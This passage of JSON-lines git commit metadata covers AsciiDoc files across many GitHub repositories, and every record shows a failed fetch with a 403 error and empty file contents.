access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2af74283ed37dfcd8ffdbfe6a7b22aca25b544fc","subject":"Update 2016-11-16-Living-documentation-a-maven-plugin.adoc","message":"Update 
2016-11-16-Living-documentation-a-maven-plugin.adoc","repos":"javathought\/javathought.github.io,javathought\/javathought.github.io,javathought\/javathought.github.io,javathought\/javathought.github.io","old_file":"_posts\/2016-11-16-Living-documentation-a-maven-plugin.adoc","new_file":"_posts\/2016-11-16-Living-documentation-a-maven-plugin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/javathought\/javathought.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8ec658053812850df5512bfd28d579133c5580e2","subject":"Renamed '_posts\/2019-03-15-Convert-Symantec-VIP-Access-Token-to-TOTP.adoc' to '_posts\/2019-03-15-Generate-Symantec-VIP-Access-Token-as-TOTP.adoc'","message":"Renamed '_posts\/2019-03-15-Convert-Symantec-VIP-Access-Token-to-TOTP.adoc' to '_posts\/2019-03-15-Generate-Symantec-VIP-Access-Token-as-TOTP.adoc'","repos":"jarbro\/jarbro.github.io,jarbro\/jarbro.github.io,jarbro\/jarbro.github.io,jarbro\/jarbro.github.io","old_file":"_posts\/2019-03-15-Generate-Symantec-VIP-Access-Token-as-TOTP.adoc","new_file":"_posts\/2019-03-15-Generate-Symantec-VIP-Access-Token-as-TOTP.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarbro\/jarbro.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"51162ab743e19160b0cc57f901a2842265d6b185","subject":"Update 2018-09-08-Go.adoc","message":"Update 2018-09-08-Go.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-08-Go.adoc","new_file":"_posts\/2018-09-08-Go.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ea25dc44d8bfd65bcf7cfdec605793b3b16e45f3","subject":"y2b create post $700 Audeze Headphones","message":"y2b create post $700 Audeze Headphones","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-03-28-700-Audeze-Headphones.adoc","new_file":"_posts\/2015-03-28-700-Audeze-Headphones.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c5c02a371cf4d802f582841bdf05b4b9aade13d9","subject":"Update 2016-07-22-Stable-Graph-Matching.adoc","message":"Update 2016-07-22-Stable-Graph-Matching.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6823b23fbb1b55367d84fe1c5b57ba3ed385a744","subject":"Update 2019-01-31-PlaidCTF-2017-Writeup.adoc","message":"Update 
2019-01-31-PlaidCTF-2017-Writeup.adoc","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2019-01-31-PlaidCTF-2017-Writeup.adoc","new_file":"_posts\/2019-01-31-PlaidCTF-2017-Writeup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5831d4627d20d8dabf46b3b6685440046aa55128","subject":"Update 2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","message":"Update 2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","new_file":"_posts\/2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0e6824d675e308d0626743c22302862ee618a915","subject":"Update 2015-10-11-Maven-in-5-Minutes.adoc","message":"Update 2015-10-11-Maven-in-5-Minutes.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-10-11-Maven-in-5-Minutes.adoc","new_file":"_posts\/2015-10-11-Maven-in-5-Minutes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b3d58445f268b4f37ae82004b46ea1893bd997c9","subject":"Explain the use of 'Cgreen' as the SUT in the first examples","message":"Explain the use of 'Cgreen' as the SUT in the first examples\n","repos":"thoni56\/cgreen,cgreen-devs\/cgreen,thoni56\/cgreen,cgreen-devs\/cgreen,thoni56\/cgreen,thoni56\/cgreen,cgreen-devs\/cgreen,cgreen-devs\/cgreen,thoni56\/cgreen,cgreen-devs\/cgreen","old_file":"doc\/cgreen-guide-en.asciidoc","new_file":"doc\/cgreen-guide-en.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thoni56\/cgreen.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"254c1e2606daf11d42c04b9c3e2c354706af97c5","subject":"mrp comments","message":"mrp comments\n","repos":"dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core","old_file":"trex_book.asciidoc","new_file":"trex_book.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"828e3f1da7fb300a92074e261a0ccd7c83c79c0f","subject":"Updated README","message":"Updated README\n","repos":"adi9090\/javaanpr,joshuagn\/ANPR,justhackit\/javaanpr,adi9090\/javaanpr,justhackit\/javaanpr,joshuagn\/ANPR","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/joshuagn\/ANPR.git\/': The requested URL returned 
error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"283eb43c92de9be54e1a6691d1da4beadb532719","subject":"Convert readme to adoc","message":"Convert readme to adoc\n","repos":"Sberned\/spring-flow-statemachine","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Sberned\/spring-flow-statemachine.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"526539e93f7a105c60cf7f8e42ff3f7447a5eef3","subject":"README.adoc: fix literal not supported by GH","message":"README.adoc: fix literal not supported by GH\n\nSigned-off-by: Philippe Proulx <2096628897b40c93960fdd9e24c9c883a54d4fe9@gmail.com>\n","repos":"alexmonthy\/lttng-scope,lttng\/lttng-scope,lttng\/lttng-scope,lttng\/lttng-scope,alexmonthy\/lttng-scope,alexmonthy\/lttng-scope,lttng\/lttng-scope","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lttng\/lttng-scope.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"05bd5a9756ddd10b61cf91c617902472fe6a7a04","subject":"Create README.adoc","message":"Create README.adoc","repos":"spring-cloud-samples\/github-analytics,marcingrzejszczak\/github-analytics-demo,marcingrzejszczak\/github-analytics-gradle,marcingrzejszczak\/github-analytics-demo","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/marcingrzejszczak\/github-analytics-gradle.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3b552580d106fedd85808736bd2c6e642104afc5","subject":"Update 2016-07-24-Gerador-de-senhas-aleatorias-Linux.adoc","message":"Update 2016-07-24-Gerador-de-senhas-aleatorias-Linux.adoc","repos":"cegohub\/cegohub.github.io,cegohub\/cegohub.github.io,cegohub\/cegohub.github.io,cegohub\/cegohub.github.io","old_file":"_posts\/2016-07-24-Gerador-de-senhas-aleatorias-Linux.adoc","new_file":"_posts\/2016-07-24-Gerador-de-senhas-aleatorias-Linux.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cegohub\/cegohub.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0dd0ea386570c5e51a8977508c38151fa20642c7","subject":"y2b create post How To Roll Off Nasty Fingerprints!","message":"y2b create post How To Roll Off Nasty Fingerprints!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-08-07-How-To-Roll-Off-Nasty-Fingerprints.adoc","new_file":"_posts\/2016-08-07-How-To-Roll-Off-Nasty-Fingerprints.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f651f8df34182ebe4cd9dfd6efb6dddb604061e8","subject":"Remove redundant info","message":"Remove redundant info\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 
403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"e690f62914e5f01b794134be985861379854fda2","subject":"Publish 1993-11-17.adoc","message":"Publish 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"1993-11-17.adoc","new_file":"1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"712dfbf417fcd15ffd7ad6a10ce10b740807da4f","subject":"Update manifest.yml","message":"Update manifest.yml\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"DevOps\/IBM Cloud.adoc","new_file":"DevOps\/IBM Cloud.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7e7358bea37e498376c858c5fd35456da6c61e6f","subject":"Update 2013-11-11-javaee7-websocket-angularjs-wildfly.adoc","message":"Update 2013-11-11-javaee7-websocket-angularjs-wildfly.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2013-11-11-javaee7-websocket-angularjs-wildfly.adoc","new_file":"_posts\/2013-11-11-javaee7-websocket-angularjs-wildfly.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2091bf35968249f5cbf75f864bdd152076a330f3","subject":"Update 2015-01-31-Das-war-der-5-Linux-Informationstag.adoc","message":"Update 2015-01-31-Das-war-der-5-Linux-Informationstag.adoc","repos":"fraslo\/fraslo.github.io,fraslo\/fraslo.github.io,fraslo\/fraslo.github.io","old_file":"_posts\/2015-01-31-Das-war-der-5-Linux-Informationstag.adoc","new_file":"_posts\/2015-01-31-Das-war-der-5-Linux-Informationstag.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fraslo\/fraslo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1632c6612577e1d05c97b693154203ff395e7f86","subject":"Update 2016-04-03-etat-limite-personnalite-borderline.adoc","message":"Update 2016-04-03-etat-limite-personnalite-borderline.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-04-03-etat-limite-personnalite-borderline.adoc","new_file":"_posts\/2016-04-03-etat-limite-personnalite-borderline.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d65cdf6cbdafa049d6a152518710a7d91962bcd2","subject":"Update 2016-07-24-OSX-cache-clean.adoc","message":"Update 2016-07-24-OSX-cache-clean.adoc","repos":"cegohub\/cegohub.github.io,cegohub\/cegohub.github.io,cegohub\/cegohub.github.io,cegohub\/cegohub.github.io","old_file":"_posts\/2016-07-24-OSX-cache-clean.adoc","new_file":"_posts\/2016-07-24-OSX-cache-clean.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cegohub\/cegohub.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eb95ec5b736fcb1f192431d8816d5799d87005e7","subject":"Updates based on feedback for Hawkular Metrics - Roadmap","message":"Updates based on feedback for Hawkular Metrics - Roadmap\n","repos":"jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,jsanda\/hawkular.github.io,pilhuhn\/hawkular.github.io,pilhuhn\/hawkular.github.io,tsegismont\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,tsegismont\/hawkular.github.io,tsegismont\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,objectiser\/hawkular.github.io,jsanda\/hawkular.github.io,tsegismont\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2016\/03\/16\/hawkular-metrics-roadmap.adoc","new_file":"src\/main\/jbake\/content\/blog\/2016\/03\/16\/hawkular-metrics-roadmap.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a1f7b9848ee29dbba4f715965e0a1c6e3dd910e5","subject":"Update 2016-6-26-PHPER-H5-base64-base64.adoc","message":"Update 2016-6-26-PHPER-H5-base64-base64.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-26-PHPER-H5-base64-base64.adoc","new_file":"_posts\/2016-6-26-PHPER-H5-base64-base64.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"710a4639f1566d59899a0856d6b98b5203c62b5f","subject":"DATAKV-265 - Create security policy readme.","message":"DATAKV-265 - Create security policy readme.\n","repos":"spring-projects\/spring-data-keyvalue","old_file":"SECURITY.adoc","new_file":"SECURITY.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-projects\/spring-data-keyvalue.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7756aabf82797329c235e0cdad7a435a574cd8ca","subject":"Update 2015-08-23-Define-Extrapolate.adoc","message":"Update 2015-08-23-Define-Extrapolate.adoc","repos":"extrapolate\/extrapolate.github.io,extrapolate\/extrapolate.github.io,extrapolate\/extrapolate.github.io","old_file":"_posts\/2015-08-23-Define-Extrapolate.adoc","new_file":"_posts\/2015-08-23-Define-Extrapolate.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/extrapolate\/extrapolate.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6ab66397b8cdf4d5c17edb9f82fd8fe1ec1a8c4f","subject":"Renamed README file.","message":"Renamed README 
file.\n","repos":"javaclinic\/20140305-spring-overview","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/javaclinic\/20140305-spring-overview.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ec74a3989269c67e90fa47c444fa01c42f5fefd6","subject":"Update 2014-03-05-Eclipse-Tips-003-Les-favoris-accelerent-le-developpement.adoc","message":"Update 2014-03-05-Eclipse-Tips-003-Les-favoris-accelerent-le-developpement.adoc","repos":"jabby\/jabby.github.io,jabby\/jabby.github.io,jabby\/jabby.github.io","old_file":"_posts\/2014-03-05-Eclipse-Tips-003-Les-favoris-accelerent-le-developpement.adoc","new_file":"_posts\/2014-03-05-Eclipse-Tips-003-Les-favoris-accelerent-le-developpement.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabby\/jabby.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"951ee4bc29ebf1eff1cb44694a75f579172cf9aa","subject":"y2b create post California Headphones Hands On CES 2012","message":"y2b create post California Headphones Hands On CES 2012","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-01-12-California-Headphones-Hands-On-CES-2012.adoc","new_file":"_posts\/2012-01-12-California-Headphones-Hands-On-CES-2012.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ef5cbdbb4ec5e2075f968a56b2da893b230cc98a","subject":"v1.79","message":"v1.79\n","repos":"kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core","old_file":"release_notes.asciidoc","new_file":"release_notes.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9c281b3c82ebeaf57af97f184374f6f48f20ac56","subject":"Update 2015-05-03-BIG-dataVistsSummer-20151.adoc","message":"Update 2015-05-03-BIG-dataVistsSummer-20151.adoc","repos":"crazyrandom\/crazyrandom.github.io,crazyrandom\/crazyrandom.github.io,crazyrandom\/crazyrandom.github.io","old_file":"_posts\/2015-05-03-BIG-dataVistsSummer-20151.adoc","new_file":"_posts\/2015-05-03-BIG-dataVistsSummer-20151.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crazyrandom\/crazyrandom.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6395e89cfca42d168b89da8e71df0e337daa5b66","subject":"Vault Guide v1 (#9772)","message":"Vault Guide v1 (#9772)\n\n* Vault Guide v1\r\n\r\nContaining only Kubernetes \/ OpenShift secrets via file based vault for now\r\n\r\nCloses #9462\r\n\r\n* Apply suggestions from code review\r\n\r\nCo-authored-by: Andrea Peruffo <a64e5d202a2d5136a788c62495372a31883d5efc@gmail.com>\r\n\r\nCo-authored-by: Andrea Peruffo 
<a64e5d202a2d5136a788c62495372a31883d5efc@gmail.com>","repos":"thomasdarimont\/keycloak,raehalme\/keycloak,hmlnarik\/keycloak,raehalme\/keycloak,stianst\/keycloak,reneploetz\/keycloak,keycloak\/keycloak,ahus1\/keycloak,jpkrohling\/keycloak,thomasdarimont\/keycloak,ahus1\/keycloak,ahus1\/keycloak,thomasdarimont\/keycloak,abstractj\/keycloak,srose\/keycloak,srose\/keycloak,srose\/keycloak,hmlnarik\/keycloak,jpkrohling\/keycloak,abstractj\/keycloak,mhajas\/keycloak,raehalme\/keycloak,reneploetz\/keycloak,keycloak\/keycloak,ahus1\/keycloak,reneploetz\/keycloak,jpkrohling\/keycloak,ahus1\/keycloak,jpkrohling\/keycloak,hmlnarik\/keycloak,srose\/keycloak,stianst\/keycloak,thomasdarimont\/keycloak,thomasdarimont\/keycloak,mhajas\/keycloak,abstractj\/keycloak,srose\/keycloak,stianst\/keycloak,abstractj\/keycloak,mhajas\/keycloak,keycloak\/keycloak,jpkrohling\/keycloak,mhajas\/keycloak,stianst\/keycloak,raehalme\/keycloak,ahus1\/keycloak,hmlnarik\/keycloak,keycloak\/keycloak,hmlnarik\/keycloak,stianst\/keycloak,hmlnarik\/keycloak,raehalme\/keycloak,reneploetz\/keycloak,keycloak\/keycloak,mhajas\/keycloak,thomasdarimont\/keycloak,abstractj\/keycloak,reneploetz\/keycloak,raehalme\/keycloak","old_file":"docs\/guides\/src\/main\/server\/vault.adoc","new_file":"docs\/guides\/src\/main\/server\/vault.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ahus1\/keycloak.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fd5213925da04430b3ccd5a3745c12139e71edd0","subject":"job #12203 - Analysis note","message":"job #12203 - Analysis note\n\nIssue appears to be the opening curly bracket causes the\nPattern.compile() to fail.\n","repos":"travislondon\/bridgepoint,travislondon\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,xtuml\/bridgepoint,travislondon\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,travislondon\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint","old_file":"doc-bridgepoint\/notes\/12203\/12203_regex_compile_curly_ant.adoc","new_file":"doc-bridgepoint\/notes\/12203\/12203_regex_compile_curly_ant.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cortlandstarrett\/bridgepoint.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e94ed6ea060c367740cf95688a3588730ca80d8c","subject":"OGM-486 Update Neo4j documentation","message":"OGM-486 Update Neo4j 
documentation\n","repos":"uugaa\/hibernate-ogm,tempbottle\/hibernate-ogm,DavideD\/hibernate-ogm-contrib,ZJaffee\/hibernate-ogm,schernolyas\/hibernate-ogm,DavideD\/hibernate-ogm,mp911de\/hibernate-ogm,hferentschik\/hibernate-ogm,gunnarmorling\/hibernate-ogm,uugaa\/hibernate-ogm,schernolyas\/hibernate-ogm,hibernate\/hibernate-ogm,ZJaffee\/hibernate-ogm,mp911de\/hibernate-ogm,DavideD\/hibernate-ogm-cassandra,DavideD\/hibernate-ogm-cassandra,gunnarmorling\/hibernate-ogm,DavideD\/hibernate-ogm-contrib,DavideD\/hibernate-ogm-contrib,Sanne\/hibernate-ogm,hibernate\/hibernate-ogm,Sanne\/hibernate-ogm,DavideD\/hibernate-ogm-cassandra,jhalliday\/hibernate-ogm,emmanuelbernard\/hibernate-ogm,Sanne\/hibernate-ogm,hibernate\/hibernate-ogm,schernolyas\/hibernate-ogm,DavideD\/hibernate-ogm,uugaa\/hibernate-ogm,DavideD\/hibernate-ogm,Sanne\/hibernate-ogm,gunnarmorling\/hibernate-ogm,tempbottle\/hibernate-ogm,jhalliday\/hibernate-ogm,ZJaffee\/hibernate-ogm,hibernate\/hibernate-ogm,tempbottle\/hibernate-ogm,DavideD\/hibernate-ogm,mp911de\/hibernate-ogm,jhalliday\/hibernate-ogm","old_file":"documentation\/manual\/src\/main\/asciidoc\/en-US\/modules\/neo4j.asciidoc","new_file":"documentation\/manual\/src\/main\/asciidoc\/en-US\/modules\/neo4j.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DavideD\/hibernate-ogm-contrib.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"b7926ba33430389ae946a762a6a9eef4edea998c","subject":"OGM-736 Move Neo4J + Transaction requirement as CAUTION","message":"OGM-736 Move Neo4J + Transaction requirement as CAUTION\n\nAlso added to the site's FAQ in parallel\n","repos":"gunnarmorling\/hibernate-ogm,uugaa\/hibernate-ogm,jhalliday\/hibernate-ogm,ZJaffee\/hibernate-ogm,schernolyas\/hibernate-ogm,hibernate\/hibernate-ogm,Sanne\/hibernate-ogm,tempbottle\/hibernate-ogm,DavideD\/hibernate-ogm,DavideD\/hibernate-ogm-contrib,ZJaffee\/hibernate-ogm,DavideD\/hibernate-ogm,jhalliday\/hibernate-ogm,mp911de\/hibernate-ogm,uugaa\/hibernate-ogm,gunnarmorling\/hibernate-ogm,DavideD\/hibernate-ogm-contrib,DavideD\/hibernate-ogm,hibernate\/hibernate-ogm,hibernate\/hibernate-ogm,Sanne\/hibernate-ogm,jhalliday\/hibernate-ogm,tempbottle\/hibernate-ogm,Sanne\/hibernate-ogm,DavideD\/hibernate-ogm,schernolyas\/hibernate-ogm,tempbottle\/hibernate-ogm,mp911de\/hibernate-ogm,mp911de\/hibernate-ogm,hibernate\/hibernate-ogm,uugaa\/hibernate-ogm,Sanne\/hibernate-ogm,DavideD\/hibernate-ogm-cassandra,DavideD\/hibernate-ogm-contrib,schernolyas\/hibernate-ogm,DavideD\/hibernate-ogm-cassandra,ZJaffee\/hibernate-ogm,DavideD\/hibernate-ogm-cassandra,gunnarmorling\/hibernate-ogm","old_file":"documentation\/manual\/src\/main\/asciidoc\/en-US\/modules\/neo4j.asciidoc","new_file":"documentation\/manual\/src\/main\/asciidoc\/en-US\/modules\/neo4j.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DavideD\/hibernate-ogm-contrib.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"46ebbaac45e56d1db783345370c285c5b7f27a1a","subject":"added publish_checklist","message":"added publish_checklist\n","repos":"S-Mach\/s_mach.codetools","old_file":"publish_checklist.asciidoc","new_file":"publish_checklist.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/S-Mach\/s_mach.codetools.git\/': The requested URL returned error: 
